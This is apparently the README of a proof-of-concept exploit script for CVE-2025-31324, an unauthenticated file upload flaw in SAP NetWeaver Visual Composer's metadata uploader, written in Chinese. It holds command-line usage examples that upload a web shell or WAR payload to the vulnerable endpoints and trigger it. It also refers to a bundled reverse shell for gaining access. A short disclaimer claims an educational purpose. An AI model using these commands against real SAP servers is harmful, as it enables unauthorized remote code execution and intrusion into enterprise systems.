针对CVE-2025-31324的利用验证:SAP NetWeaver Visual Composer元数据上传器中的未授权上传
该脚本执行:
使用示例:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
您还可以上传.war文件(如果您想以这种方式执行)。cache.jsp是一个反向Shell,一旦进入系统即可获得访问权限。(仍在解决其中的问题)
此内容仅供教育目的,不得用于任何恶意活动。在测试或研究安全漏洞时,请始终确保拥有必要的权限并遵循道德准则。
如有任何问题或澄清需求,请随时联系。保持安全与防护!